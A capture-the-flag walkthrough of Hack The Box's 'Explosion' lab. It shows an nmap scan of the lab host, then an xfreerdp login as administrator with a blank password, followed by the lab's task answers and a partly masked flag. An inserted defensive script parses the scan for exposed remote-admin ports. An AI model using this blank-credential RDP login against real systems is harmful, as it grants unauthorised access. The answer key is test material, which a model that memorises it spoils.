Hack The Box – Starting point – Explosion – TIER 0 Machines

Hey folks, how's it going?

Today I'm bringing the walkthrough of the Explosion lab from HTB's Starting Point.

Capture the Flag

First, I ran nmap to discover the open ports. Several ports are open; the focus of this lab is port 3389, used by the RDP protocol.

nmap -sSV -p- -Pn 10.129.176.127 --min-rate=1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 09:11 EST 
Nmap scan report for 10.129.23.134 
Host is up (0.19s latency). 
Not shown: 65521 closed tcp ports (reset) 
PORT      STATE SERVICE       VERSION 
135/tcp   open  msrpc         Microsoft Windows RPC 
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn 
445/tcp   open  microsoft-ds? 
3389/tcp  open  ms-wbt-server Microsoft Terminal Services 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
49664/tcp open  msrpc         Microsoft Windows RPC 
49665/tcp open  msrpc         Microsoft Windows RPC 
49666/tcp open  msrpc         Microsoft Windows RPC 
49667/tcp open  msrpc         Microsoft Windows RPC 
49668/tcp open  msrpc         Microsoft Windows RPC 
49669/tcp open  msrpc         Microsoft Windows RPC 
49670/tcp open  msrpc         Microsoft Windows RPC 
49671/tcp open  msrpc         Microsoft Windows RPC 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
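
Read from the defender's side, the same scan output shows which remote logon and remote administration services the host exposes. The following is an added example, not part of the original post: it parses the nmap service table and lists those ports with what to verify on each. The port-to-action policy and the function names are assumptions made for illustration.

```python
import re

# Service table rows copied from the nmap output above (subset).
SCAN = """\
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
"""

# Assumed review policy (not from the original page): ports that offer
# remote logon or remote administration and what to verify on each.
REMOTE_ADMIN = {
    23: ("telnet", "disable; cleartext protocol"),
    445: ("SMB", "restrict to trusted networks"),
    3389: ("RDP", "require NLA and non-blank passwords; restrict source IPs"),
    5985: ("WinRM over HTTP", "restrict source IPs or disable if unused"),
}

ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_services(text):
    """Parse nmap's PORT/STATE/SERVICE/VERSION rows into dicts."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # skip headers, banners and blank lines
        port, proto, state, service, version = m.groups()
        rows.append({"port": int(port), "proto": proto, "state": state,
                     "service": service.rstrip("?"), "version": version.strip()})
    return rows

def remote_admin_findings(rows):
    """Return (port, label, nmap_service, action) for open remote-admin ports."""
    findings = []
    for r in rows:
        if r["state"] == "open" and r["proto"] == "tcp" and r["port"] in REMOTE_ADMIN:
            label, action = REMOTE_ADMIN[r["port"]]
            findings.append((r["port"], label, r["service"], action))
    return sorted(findings)

if __name__ == "__main__":
    for port, label, service, action in remote_admin_findings(parse_services(SCAN)):
        print(f"{port}/tcp {label} ({service}): {action}")
```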

It was possible to log in via RDP with the credential:
User: administrator
Password: (blank)

xfreerdp /v:10.129.176.127 /u:administrator

After logging in, the flag was captured.

Tasks

TASK 1 – What does the 3-letter acronym RDP stand for?
A: Remote Desktop Protocol

TASK 2 – What is a 3-letter acronym that refers to interaction with the host through a command line interface?
A: CLI

TASK 3 – What about graphical user interface interactions?
A: GUI

TASK 4 – What is the name of an old remote access tool that came without encryption by default and listens on TCP port 23?
A: telnet

TASK 5 – What is the name of the service running on port 3389 TCP?
A: ms-wbt-server

TASK 6 – What is the switch used to specify the target host’s IP address when using xfreerdp?
A: /v:

TASK 7 – What username successfully returns a desktop projection to us with a blank password?
A: administrator

SUBMIT FLAG – Submit root flag
A: 951fa96d7830c451XXXXXXXXXXX

About Vitor Prado
Born and raised on the outskirts of Diadema-SP, I found in study and knowledge an alternative way to face life's challenges, despite the many barriers placed in the way.
